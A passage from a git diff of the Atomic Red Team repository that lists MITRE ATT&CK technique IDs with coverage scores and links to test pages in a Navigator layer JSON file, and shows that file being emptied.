Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 03281866..e69de29b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +0,0 @@ -{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View 